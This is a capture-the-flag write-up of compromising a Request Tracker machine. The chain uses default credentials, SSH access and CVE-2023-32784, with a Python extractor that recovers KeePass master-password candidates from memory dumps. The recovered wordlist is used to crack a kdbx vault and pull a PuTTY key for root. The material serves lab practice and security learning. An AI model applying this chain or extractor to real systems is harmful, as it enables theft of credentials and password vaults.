Enumeration

Nmap

Initial Nmap scan revealed that the SSH and HTTP ports are open.

00 - nmap

WEB Enumeration

Visiting the HTTP website revealed a domain, so I added it to the hosts file.

01 - website

Searching “request tracker default credentials” on the internet revealed a root credential, and I logged in to the website.

02 - root password

Exploitation

Inside the website under Admin -> Users -> Select, there was a user other than root.

03 Admin-Users-Select

Clicking on it and analyzing it revealed the default password for that user.

04 - password

So I simply logged in using SSH.

05 - user

Privilege Escalation

In the user’s home directory, there was a zipped file. Inside it there was a KeePass memory dump and a kdbx file.

06 - rt3000

So I transferred those files to my computer using scp and started analyzing them.

CVE-2023-32784

This version of KeePass was vulnerable to CVE-2023-32784, which is described as “In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump”.

So at first I tried to dump the password with this tool but could not. Then I used keepass-dump-extractor to extract a wordlist.

07 - create keepass list from dumps
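As an added illustration (not code from the original post or from the tools it links), this shows the pattern behind CVE-2023-32784: the masked master-password box in KeePass 2.x before 2.54 left, for every keystroke, a UTF-16 string of bullet characters followed by the typed character in process memory, so a dump leaks every position except the first. The dump bytes here are constructed inline to simulate that leak; the bullet encoding is the real one, everything else is a stand-in.

```python
import itertools
import re

# KeePass masks typed characters with U+2022 ("•"); .NET strings are UTF-16LE.
BULLET = "\u2022".encode("utf-16-le")

def extract_candidates(dump: bytes) -> dict:
    """Map 0-based password position -> set of leaked characters.

    Each leaked fragment is n bullets followed by one code unit X, meaning
    "X was typed at position n".  Position 0 never leaks: the first keystroke
    has no masked prefix in front of it.
    """
    fragment = re.compile(
        rb"(?:" + re.escape(BULLET) + rb")+(?!" + re.escape(BULLET) + rb")(..)",
        re.DOTALL,
    )
    found = {}
    for m in fragment.finditer(dump):
        position = (len(m.group(0)) - 2) // 2          # number of bullets
        char = m.group(1).decode("utf-16-le", errors="replace")
        found.setdefault(position, set()).add(char)
    return found

def reconstruct(candidates: dict, unknown: str = "?") -> list:
    """Expand per-position candidates into full password guesses.

    Typos and corrections leave extra fragments, so a position can have
    several candidates; the unrecoverable first character is a placeholder.
    """
    if not candidates:
        return []
    length = max(candidates) + 1
    per_pos = [sorted(candidates.get(i, {unknown})) for i in range(1, length)]
    return ["".join((unknown,) + combo) for combo in itertools.product(*per_pos)]

def _fragment(prefix_len: int, ch: str) -> bytes:
    return BULLET * prefix_len + ch.encode("utf-16-le")

# Constructed sample dump: someone types "Pássw0rd!" with one stray "x" at
# position 2, separated by filler bytes standing in for unrelated memory.
TYPED = "Pássw0rd!"
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"".join(_fragment(i, TYPED[i]) + b"\x00\x00A\x00" for i in range(1, len(TYPED)))
    + _fragment(2, "x") + b"\xff" * 16
)

if __name__ == "__main__":
    for guess in reconstruct(extract_candidates(SAMPLE_DUMP)):
        print(guess)
```

The output is a short wordlist with an unknown first character, which is why the post's next step brute-forces the kdbx file against it rather than using a single recovered password.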

Then using the wordlist I cracked the kdbx file.

08 - cracked

After cracking it I tried to log in with keepass2 but it did not work because the password had some non-unicode characters. So I used kpcli to log in.

09 - kpcli login

Inside kpcli we can use commands like cd and ls. Some enumeration revealed two ticket files.

I can run show -f to show the record. The first record revealed a PuTTY SSH key inside it.

10 -ticket file

So at first I downloaded putty-tools, then ran puttygen to create an OpenSSH key “id_rsa” from the PuTTY key.

11 - putty to openssh

Then using that key I got root.

12 - ssh

Pwned

The machine was pwned.

13 - pwned
